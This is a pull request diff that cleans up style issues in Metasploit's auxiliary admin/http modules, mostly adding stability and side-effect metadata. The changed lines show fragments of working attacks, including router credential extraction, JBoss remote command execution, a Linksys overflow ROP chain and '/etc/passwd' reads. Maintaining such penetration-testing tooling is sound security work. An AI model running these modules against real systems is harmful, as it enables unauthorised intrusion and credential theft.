### PR TITLE
modules/auxiliary/admin/http: Resolve RuboCop violations

### DIFF
--- a/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
@@ -31,7 +31,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
         ],
         'DisclosureDate' => '2014-12-17',
-        'License' => MSF_LICENSE
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb
+++ b/modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb
@@ -45,7 +45,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'CVE', '2015-0965' ], # CSRF vulnerability
           [ 'CVE', '2015-0966' ], # "technician/yZgO8Bvj" web interface backdoor
           [ 'URL', 'http://web.archive.org/web/20220810083803/https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/' ],
-        ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/axigen_file_access.rb
+++ b/modules/auxiliary/admin/http/axigen_file_access.rb
@@ -33,7 +33,12 @@ class MetasploitModule < Msf::Auxiliary
           ['Delete', { 'Description' => 'Delete remote file' }]
         ],
         'DefaultAction' => 'Read',
-        'DisclosureDate' => '2012-10-31'
+        'DisclosureDate' => '2012-10-31',
+        'Notes' => {
+          'Stability' => [OS_RESOURCE_LOSS],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -118,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res && (res.code == 200) && res.body =~ (/View Log Files/)
+    if res && (res.code == 200) && res.body =~ /View Log Files/
       print_good("File #{file} deleted")
     else
       print_error("Error deleting file #{file}")
@@ -167,7 +172,7 @@ class MetasploitModule < Msf::Auxiliary
       }
     )
 
-    if res && (res.code == 303) && res.headers['Location'] =~ (/_h=([a-f0-9]*)/)
+    if res && (res.code == 303) && res.headers['Location'] =~ /_h=([a-f0-9]*)/
       @token = ::Regexp.last_match(1)
       if res.get_cookies =~ /_hadmin=([a-f0-9]*)/
         @session = ::Regexp.last_match(1)

--- a/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb
+++ b/modules/auxiliary/admin/http/cfme_manageiq_evm_pass_reset.rb
@@ -29,7 +29,12 @@ class MetasploitModule < Msf::Auxiliary
       'DefaultOptions' => {
         'SSL' => true
       },
-      'DisclosureDate' => 'Nov 12 2013'
+      'DisclosureDate' => 'Nov 12 2013',
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+        'Reliability' => []
+      }
     )
 
     register_options(
@@ -41,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
         OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
         OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
-      ], self.class
+      ]
     )
   end
 

--- a/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb
+++ b/modules/auxiliary/admin/http/cnpilot_r_cmd_exec.rb
@@ -24,7 +24,12 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2017-5259'],
           ['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']
         ],
-        'License' => MSF_LICENSE
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -35,7 +40,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
         OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'admin']),
         OptString.new('CMD', [true, 'Command(s) to run', 'cat /etc/passwd'])
-      ], self.class
+      ]
     )
 
     deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')

--- a/modules/auxiliary/admin/http/cnpilot_r_fpt.rb
+++ b/modules/auxiliary/admin/http/cnpilot_r_fpt.rb
@@ -23,7 +23,12 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2017-5261'],
           ['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']
         ],
-        'License' => MSF_LICENSE
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -34,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
         OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'admin']),
         OptString.new('FILENAME', [true, 'Filename to read', '/etc/passwd'])
-      ], self.class
+      ]
     )
 
     deregister_options('DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE', 'PASS_FILE', 'BLANK_PASSWORDS', 'BRUTEFORCE_SPEED', 'STOP_ON_SUCCESS')

--- a/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
+++ b/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
@@ -20,7 +20,13 @@ class MetasploitModule < Msf::Auxiliary
         [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
       ],
       'Author' => [ 'aushack' ],
-      'License' => MSF_LICENSE)
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
+    )
 
     register_options(
       [
@@ -41,8 +47,7 @@ class MetasploitModule < Msf::Auxiliary
       }, 25
     )
 
-    if (res && (res.code == 500))
-
+    if res && res.code == 500
       print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")
 
       file = send_request_raw(
@@ -52,15 +57,17 @@ class MetasploitModule < Msf::Auxiliary
         }, 25
       )
 
-      if (file && (file.code == 200))
+      if file && (file.code == 200)
         print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
-      elsif (file && file.code)
+      elsif file && file.code
         print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
       end
-    elsif (res && res.code)
+    elsif res && res.code
       print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
     end
-  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-  rescue ::Timeout::Error, ::Errno::EPIPE
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+    vprint_error(e.message)
+  rescue ::Timeout::Error, ::Errno::EPIPE => e
+    vprint_error(e.message)
   end
 end

--- a/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_300_600_exec_noauth.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
           [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
         ],
-        'DisclosureDate' => '2013-02-04'
+        'DisclosureDate' => '2013-02-04',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -56,7 +61,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       )
       return if res.nil?
-      return if (res.headers['Server'].nil? || res.headers['Server'] !~ (%r{Linux,\ HTTP/1.1,\ DIR}))
+      return if res.headers['Server'].nil? || res.headers['Server'] !~ %r{Linux,\ HTTP/1.1,\ DIR}
       return if res.code == 404
     rescue ::Rex::ConnectionError
       vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")

--- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
@@ -24,7 +24,12 @@ class MetasploitModule < Msf::Auxiliary
         'Roberto Paleari <roberto[at]greyhats.it>', # Vulnerability discovery
         'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
       ],
-      'License' => MSF_LICENSE
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
   end
 
@@ -35,63 +40,60 @@ class MetasploitModule < Msf::Auxiliary
     # curl -d SERVICES=DEVICE.ACCOUNT http://192.168.178.200/getcfg.php | egrep "\<name|password"
 
     # download configuration
-    begin
-      res = send_request_cgi({
-        'uri' => '/getcfg.php',
-        'method' => 'POST',
-        'vars_post' =>
-          {
-            'SERVICES' => 'DEVICE.ACCOUNT'
-          }
-      })
+    res = send_request_cgi({
+      'uri' => '/getcfg.php',
+      'method' => 'POST',
+      'vars_post' =>
+        {
+          'SERVICES' => 'DEVICE.ACCOUNT'
+        }
+    })
 
-      return if res.nil?
-      return if (res.headers['Server'].nil? || res.headers['Server'] !~ (/DIR-645 Ver 1\.0/))
-      return if (res.code == 404)
+    return if res.nil?
+    return if res.headers['Server'].nil? || res.headers['Server'] !~ /DIR-645 Ver 1\.0/
+    return if (res.code == 404)
 
-      if res.body =~ %r{<password>(.*)</password>}
-        print_good("#{rhost}:#{rport} - credentials successfully extracted")
+    if res.body =~ %r{<password>(.*)</password>}
+      print_good("#{rhost}:#{rport} - credentials successfully extracted")
 
-        # store all details as loot -> there is some useful stuff in the response
-        loot = store_loot('dlink.dir645.config', 'text/plain', rhost, res.body)
-        print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}")
+      # store all details as loot -> there is some useful stuff in the response
+      loot = store_loot('dlink.dir645.config', 'text/plain', rhost, res.body)
+      print_good("#{rhost}:#{rport} - Account details downloaded to: #{loot}")
 
-        res.body.each_line do |line|
-          if line =~ %r{<name>(.*)</name>}
-            @user = ::Regexp.last_match(1)
-            next
-          end
-          next unless line =~ %r{<password>(.*)</password>}
-
-          pass = ::Regexp.last_match(1)
-          vprint_good("user: #{@user}")
-          vprint_good("pass: #{pass}")
-
-          connection_details = {
-            module_fullname: fullname,
-            username: @user,
-            private_data: pass,
-            private_type: :password,
-            workspace_id: myworkspace_id,
-            proof: line,
-            last_attempted_at: DateTime.now, # kept in refactor may not be valid, obtained but do not attempted here
-            status: Metasploit::Model::Login::Status::UNTRIED
-          }.merge(service_details)
-          create_credential_and_login(connection_details)
-
-          report_cred(
-            ip: rhost,
-            port: rport,
-            service_name: 'http',
-            user: @user,
-            password: pass,
-            proof: line
-          )
+      res.body.each_line do |line|
+        if line =~ %r{<name>(.*)</name>}
+          @user = ::Regexp.last_match(1)
+          next
         end
+        next unless line =~ %r{<password>(.*)</password>}
+
+        pass = ::Regexp.last_match(1)
+        vprint_good("user: #{@user}")
+        vprint_good("pass: #{pass}")
+
+        connection_details = {
+          module_fullname: fullname,
+          username: @user,
+          private_data: pass,
+          private_type: :password,
+          workspace_id: myworkspace_id,
+          proof: line,
+          last_attempted_at: DateTime.now, # kept in refactor may not be valid, obtained but do not attempted here
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }.merge(service_details)
+        create_credential_and_login(connection_details)
+
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'http',
+          user: @user,
+          password: pass,
+          proof: line
+        )
       end
-    rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-      return
     end
+  rescue ::Rex::ConnectionError
+    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
   end
 end

--- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
@@ -23,7 +23,12 @@ class MetasploitModule < Msf::Auxiliary
       'Author' => [
         'Michael Messner <devnull[at]s3cur1ty.de>'
       ],
-      'License' => MSF_LICENSE
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
   end
 
@@ -31,56 +36,53 @@ class MetasploitModule < Msf::Auxiliary
     vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
 
     # download configuration
-    begin
-      res = send_request_cgi({
-        'uri' => '/config.bin',
-        'method' => 'GET'
-      })
+    res = send_request_cgi({
+      'uri' => '/config.bin',
+      'method' => 'GET'
+    })
 
-      return if res.nil?
-      return if (res.headers['Server'].nil? || res.headers['Server'] !~ (/micro_httpd/))
-      return if (res.code == 404)
+    return if res.nil?
+    return if res.headers['Server'].nil? || res.headers['Server'] !~ /micro_httpd/
+    return if (res.code == 404)
 
-      if res.body =~ (/sysPassword value/) || res.body =~ (/sysUserName value/)
-        if res.body !~ /sysPassword value/
-          print_status("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")
-        else
-          print_good("#{rhost}:#{rport} - Credentials successfully extracted")
-        end
-
-        # store all details as loot -> there is some useful stuff in the response
-        loot = store_loot('dlink.dsl320b.config', 'text/plain', rhost, res.body)
-        print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")
-
-        user = ''
-        pass = ''
-
-        res.body.each_line do |line|
-          if line =~ %r{<sysUserName\ value="(.*)"/>}
-            user = ::Regexp.last_match(1)
-            next
-          end
-          next unless line =~ %r{<sysPassword\ value="(.*)"/>}
-
-          pass = ::Regexp.last_match(1)
-          pass = Rex::Text.decode_base64(pass)
-          print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")
-
-          connection_details = {
-            module_fullname: fullname,
-            username: user,
-            private_data: pass,
-            private_type: :password,
-            workspace_id: myworkspace_id,
-            proof: line,
-            status: Metasploit::Model::Login::Status::UNTRIED
-          }.merge(service_details)
-          create_credential_and_login(connection_details)
-        end
+    if res.body =~ /sysPassword value/ || res.body =~ /sysUserName value/
+      if res.body !~ /sysPassword value/
+        print_status("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")
+      else
+        print_good("#{rhost}:#{rport} - Credentials successfully extracted")
       end
-    rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-      return
+
+      # store all details as loot -> there is some useful stuff in the response
+      loot = store_loot('dlink.dsl320b.config', 'text/plain', rhost, res.body)
+      print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")
+
+      user = ''
+      pass = ''
+
+      res.body.each_line do |line|
+        if line =~ %r{<sysUserName\ value="(.*)"/>}
+          user = ::Regexp.last_match(1)
+          next
+        end
+        next unless line =~ %r{<sysPassword\ value="(.*)"/>}
+
+        pass = ::Regexp.last_match(1)
+        pass = Rex::Text.decode_base64(pass)
+        print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")
+
+        connection_details = {
+          module_fullname: fullname,
+          username: user,
+          private_data: pass,
+          private_type: :password,
+          workspace_id: myworkspace_id,
+          proof: line,
+          status: Metasploit::Model::Login::Status::UNTRIED
+        }.merge(service_details)
+        create_credential_and_login(connection_details)
+      end
     end
+  rescue ::Rex::ConnectionError
+    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
   end
 end

--- a/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb
+++ b/modules/auxiliary/admin/http/gitlab_password_reset_account_takeover.rb
@@ -39,6 +39,11 @@ class MetasploitModule < Msf::Auxiliary
         ['URL', 'https://github.com/duy-31/CVE-2023-7028']
       ],
       'DisclosureDate' => '2024-01-11',
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+        'Reliability' => []
+      }
     )
 
     register_options(

--- a/modules/auxiliary/admin/http/gitstack_rest.rb
+++ b/modules/auxiliary/admin/http/gitstack_rest.rb
@@ -83,7 +83,12 @@ class MetasploitModule < Msf::Auxiliary
             }
           ]
         ],
-        'DefaultAction' => 'LIST'
+        'DefaultAction' => 'LIST',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 
@@ -163,7 +168,7 @@ class MetasploitModule < Msf::Auxiliary
           })
         rescue Rex::ConnectionError, Errno::ECONNRESET => e
           print_error("Failed: #{e.class} - #{e.message}")
-          return
+          break
         end
 
         if res && res.code == 200
@@ -252,7 +257,7 @@ class MetasploitModule < Msf::Auxiliary
       mylist = get_repos
       if mylist
         mylist.each do |item|
-          print_good((item['name']).to_s)
+          print_good(item['name'].to_s)
         end
       else
         print_error('Failed to retrieve repository list')

--- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
+++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb
@@ -24,10 +24,14 @@ class MetasploitModule < Msf::Auxiliary
         'References' => [
           [ 'OSVDB', '5798' ],
           [ 'BID', '10224' ],
-          # [ 'CVE', '' ],# No CVE!
           [ 'EDB', '294' ]
         ],
-        'DisclosureDate' => '2004-04-27'
+        'DisclosureDate' => '2004-04-27',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/iis_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb
@@ -27,7 +27,12 @@ class MetasploitModule < Msf::Auxiliary
           'sinn3r'
         ],
         'License' => MSF_LICENSE,
-        'DisclosureDate' => '2010-07-02'
+        'DisclosureDate' => '2010-07-02',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
+++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb
@@ -19,7 +19,12 @@ class MetasploitModule < Msf::Auxiliary
         [ 'CVE', '2009-2367' ],
       ],
       'Author' => [ 'aushack' ],
-      'License' => MSF_LICENSE
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
 
     register_options(
@@ -38,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
         'method' => 'GET'
       }, 25)
 
-      if (res && res.to_s =~ (/Log out/))
+      if res && res.to_s =~ /Log out/
         print_status("Found valid session ID number #{x}!")
         print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
         break
@@ -46,7 +51,8 @@ class MetasploitModule < Msf::Auxiliary
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       print_error("Unable to connect to #{rhost}:#{rport}")
       break
-    rescue ::Timeout::Error, ::Errno::EPIPE
+    rescue ::Timeout::Error, ::Errno::EPIPE => e
+      vprint_error(e.message)
     end
   end
 end

--- a/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb
+++ b/modules/auxiliary/admin/http/jboss_deploymentfilerepository.rb
@@ -28,6 +28,11 @@ class MetasploitModule < Msf::Auxiliary
       ],
       'DefaultAction' => 'Deploy',
       'License' => BSD_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK],
+        'Reliability' => []
+      }
     )
 
     register_options(
@@ -76,8 +81,8 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status('Calling stager to deploy the payload warfile (might take some time)')
     stager_uri = '/' + stager_base + '/' + stager_jsp_name + '.jsp'
-    stager_res = deploy('uri' => stager_uri,
-                        'method' => 'GET')
+    deploy('uri' => stager_uri,
+           'method' => 'GET')
 
     if res && res.code == 200
       print_good('Payload deployed')
@@ -94,11 +99,11 @@ class MetasploitModule < Msf::Auxiliary
     end
     delete_res << delete_file(stager_base + '.war', stager_jsp_name, '.jsp')
     delete_res << delete_file('./', stager_base + '.war', '')
-    delete_res.each do |res|
-      if !res
+    delete_res.each do |r|
+      if !r
         print_warning('Unable to remove WAR [No Response]')
-      elsif (res.code < 200 || res.code >= 300)
-        print_warning("WARNING: Unable to remove WAR [#{res.code} #{res.message}]")
+      elsif r.code < 200 || r.code >= 300
+        print_warning("WARNING: Unable to remove WAR [#{r.code} #{r.message}]")
       end
     end
   end

--- a/modules/auxiliary/admin/http/jboss_seam_exec.rb
+++ b/modules/auxiliary/admin/http/jboss_seam_exec.rb
@@ -27,10 +27,15 @@ class MetasploitModule < Msf::Auxiliary
         ],
         'License' => MSF_LICENSE,
         'References' => [
-          [ 'CVE', '2010-1871' ],
-          [ 'OSVDB', '66881']
+          ['CVE', '2010-1871'],
+          ['OSVDB', '66881']
         ],
-        'DisclosureDate' => '2010-07-19'
+        'DisclosureDate' => '2010-07-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -65,18 +70,18 @@ class MetasploitModule < Msf::Auxiliary
         }, 20
       )
 
-      if (res && res.headers['Location'] =~ (/java.lang.Runtime.exec%28java.lang.String%29/))
+      if res && res.headers['Location'] =~ /java.lang.Runtime.exec%28java.lang.String%29/
         flag_found_one = index
         print_status('Found right index at [' + index.to_s + '] - exec')
-      elsif (res && res.headers['Location'] =~ (/java.lang.Runtime\+java.lang.Runtime.getRuntime/))
+      elsif res && res.headers['Location'] =~ /java.lang.Runtime\+java.lang.Runtime.getRuntime/
         print_status('Found right index at [' + index.to_s + '] - getRuntime')
         flag_found_two = index
       else
-        print_status('Index [' + index.to_s + ']')
+        print_status("Index [#{index}]")
       end
     end
 
-    if (flag_found_one != 255 && flag_found_two != 255)
+    if flag_found_one != 255 && flag_found_two != 255
       print_status('Target appears VULNERABLE!')
       print_status('Sending remote command:' + datastore['CMD'])
 
@@ -89,7 +94,7 @@ class MetasploitModule < Msf::Auxiliary
         }, 20
       )
 
-      if (res && res.headers['Location'] =~ (/pwned=java.lang.UNIXProcess/))
+      if res && res.headers['Location'] =~ /pwned=java.lang.UNIXProcess/
         print_good('Exploited successfully')
       else
         print_error('Exploit failed')

--- a/modules/auxiliary/admin/http/joomla_registration_privesc.rb
+++ b/modules/auxiliary/admin/http/joomla_registration_privesc.rb
@@ -28,7 +28,12 @@ class MetasploitModule < Msf::Auxiliary
           'Vitor Oliveira <vo[at]integrity.pt>',  # module creation and privilege escalation
         ],
         'License' => MSF_LICENSE,
-        'DisclosureDate' => '2016-10-25'
+        'DisclosureDate' => '2016-10-25',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/kaseya_master_admin.rb
+++ b/modules/auxiliary/admin/http/kaseya_master_admin.rb
@@ -29,7 +29,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt'],
           ['URL', 'https://seclists.org/bugtraq/2015/Sep/132']
         ],
-        'DisclosureDate' => '2015-09-23'
+        'DisclosureDate' => '2015-09-23',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
+++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb
@@ -22,7 +22,12 @@ class MetasploitModule < Msf::Auxiliary
         ['CWE', '862'],
         ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=970849']
       ],
-      'DisclosureDate' => 'Mar 24 2014'
+      'DisclosureDate' => 'Mar 24 2014',
+      'Notes' => {
+        'Stability' => [CRASH_SAFE],
+        'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+        'Reliability' => []
+      }
     )
 
     register_options(
@@ -32,7 +37,7 @@ class MetasploitModule < Msf::Auxiliary
         OptString.new('USERNAME', [true, 'Your username']),
         OptString.new('PASSWORD', [true, 'Your password']),
         OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
-      ], self.class
+      ]
     )
   end
 

--- a/modules/auxiliary/admin/http/limesurvey_file_download.rb
+++ b/modules/auxiliary/admin/http/limesurvey_file_download.rb
@@ -30,7 +30,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://www.limesurvey.org/blog/22-security/136-limesurvey-security-advisory-10-2015'],
           ['URL', 'https://github.com/LimeSurvey/LimeSurvey/compare/2.06_plus_151014...2.06_plus_151016?w=1']
         ],
-        'DisclosureDate' => '2015-10-12'
+        'DisclosureDate' => '2015-10-12',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 

--- a/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
@@ -26,7 +26,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'EDB', '24475' ],
           [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
         ],
-        'DisclosureDate' => '2013-02-05'
+        'DisclosureDate' => '2013-02-05',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
       )
     )
 
@@ -76,7 +81,7 @@ class MetasploitModule < Msf::Auxiliary
 
     vprint_status("#{rhost}:#{rport} - using the following target URL: #{uri}")
     begin
-      res = send_request_cgi({
+      send_request_cgi({
         'uri' => uri,
         'method' => 'POST',
         'authorization' => basic_auth(user, pass),

--- a/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb
+++ b/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb
@@ -27,7 +27,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'OSVDB', '103521' ],
           [ 'URL', 'https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow/' ] # a huge amount of details about this vulnerability and the original exploit
         ],
-        'DisclosureDate' => '2014-02-19'
+        'DisclosureDate' => '2014-02-19',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
   end
@@ -76,7 +81,7 @@ class MetasploitModule < Msf::Auxiliary
       postdata << Rex::Text.rand_text_alpha(4)            # ROP 2 $s0, don't care
       postdata << Rex::Text.rand_text_alpha(4)            # ROP 2 $s1, don't care
       postdata << [0x803471b8].pack('N')                  # ROP 2 $ra (address of itself)
-      postdata << Rex::Text.rand_text_alpha(4 - (3 * (i / 3)))  # Stack filler
+      postdata << Rex::Text.rand_text_alpha(4 - (3 * (i / 3))) # Stack filler
     end
 
     begin

--- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb
+++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb
@@ -33,7 +33,12 @@ class MetasploitModule < Msf::Auxiliary
           [ 'BID', '57459' ],
           [ 'OSVDB', '89421' ]
         ],
-        'DisclosureDate' => '2013-01-18'
+        'DisclosureDate' => '2013-01-18',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES],
+          'Reliability' => []
+        }
       )
     )
 
@@ -152,10 +157,10 @@ class MetasploitModule < Msf::Auxiliary
           'wan_domain' => wandomain.to_s,
           'mtu_enable' => '1',
           'wan_mtu' => wanmtu.to_s,
-          'lan_ipaddr_0' => (ip[0]).to_s,
-          'lan_ipaddr_1' => (ip[1]).to_s,
-          'lan_ipaddr_2' => (ip[2]).to_s,
-          'lan_ipaddr_3' => (ip[3]).to_s,
+          'lan_ipaddr_0' => ip[0].to_s,
+          'lan_ipaddr_1' => ip[1].to_s,
+          'lan_ipaddr_2' => ip[2].to_s,
+          'lan_ipaddr_3' => ip[3].to_s,
           'lan_netmask' => netmask.to_s,
           'lan_proto' => 'dhcp',
           'dhcp_check' => '1',

--- a/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb
+++ b/modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb
@@ -27,7 +27,12 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://seclists.org/fulldisclosure/2015/Jan/2'],
           ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],
         ],
